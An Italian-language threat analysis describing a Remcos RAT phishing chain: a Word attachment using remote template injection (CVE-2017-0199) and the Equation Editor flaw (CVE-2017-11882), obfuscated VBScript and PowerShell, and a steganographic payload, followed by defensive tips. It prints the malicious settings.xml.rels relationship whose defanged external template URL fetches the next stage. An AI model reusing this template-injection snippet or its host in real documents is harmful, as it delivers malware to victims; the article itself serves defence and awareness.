Un nuovo metodo per diffondere il Trojan RAT Remcos (Remote Access Trojan) è stato identificato.
Questo malware, noto per fornire ai cybercriminali il controllo completo sui sistemi infetti, viene distribuito attraverso documenti Word malevoli contenenti URL abbreviati. Questi URL conducono al download del Trojan RAT Remcos, che può essere utilizzato per rubare dati, spionaggio e altre attività dannose.
Catena di infezione
L’attacco inizia con un’email contenente un file .docx allegato, progettato per ingannare il destinatario. Quando si analizza questo file, si trova un URL abbreviato, che indica un’intenzione malevola. Questo URL reindirizza al download di una variante del malware Equation Editor in formato RTF.
Sfruttando la vulnerabilità dell’Editor delle Equazioni (CVE-2017-11882), il malware tenta di scaricare un file VB script composto da una lunga sequenza di variabili e stringhe concatenate, probabilmente crittografate o oscurate. Queste stringhe formano un payload crittografato, che potrebbe essere decodificato o eseguito in seguito nel codice.
Il codice VB script si deobfusca in codice PowerShell, che tenta di scaricare un binario dannoso tramite un’immagine steganografica e stringhe Base64 invertite.
Analisi dettagliata dell’attacco
Il documento contiene due file critici: settings.xml.rels e document.xml.rels, situati in word/_rels. Il file settings.xml.rels rivela un URL abbreviato responsabile del download della fase successiva dell’infezione:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="hxxp://ilang[.]in/QNkGv" TargetMode="External"/>
</Relationships>
L’esecuzione del file .docx in un ambiente sandbox rivela che contiene la vulnerabilità CVE-2017-0199. Sfruttando questa vulnerabilità, il documento tenta di connettersi a un server remoto per scaricare un file dannoso.
L’attaccante utilizza un servizio di abbreviazione URL per mascherare l’URL dannoso, rendendolo difficile da riconoscere per la vittima e bypassando i filtri di sicurezza che potrebbero segnalare URL sospetti.
Ulteriori indagini sul \word\embeddings rivelano file PDF incorporati all’interno di file oleObject bin. Il file PDF sembra innocuo, mostrando una transazione bancaria tra una società e un’altra.
Suggerimenti, soluzioni, consigli e best practice
Per proteggere la tua azienda da tali minacce, segui questi suggerimenti, soluzioni, consigli e best practice:
- Educazione della forza lavoro: Forma i tuoi dipendenti sui pericoli dei collegamenti abbreviati e su come riconoscere i segni di attacchi di phishing.
- Sicurezza delle email: Implementa soluzioni di sicurezza delle email che analizzino il contenuto delle email e blocchino i collegamenti abbreviati sospetti.
- Sandboxing: Utilizza ambienti di sandboxing per analizzare i file sospetti e identificare eventuali vulnerabilità o attività dannose.
- Aggiornamenti software: Assicurati che tutti i software siano aggiornati con le ultime patch di sicurezza.
- Backup dei dati: Esegui regolarmente il backup dei dati per garantire la disponibilità dei dati in caso di infezione da malware.
- Monitoraggio della rete: Monitora attivamente la rete per rilevare eventuali attività sospette o anomalie.
- Politiche di sicurezza: Implementa e fai rispettare politiche di sicurezza chiare che limitino l’accesso ai dati sensibili e regolino l’uso di URL abbreviati.
In conclusione, essere consapevoli dei pericoli associati ai collegamenti abbreviati e adottare misure proattive per mitigare tali minacce è fondamentale per proteggere la tua azienda dalle infezioni da malware.
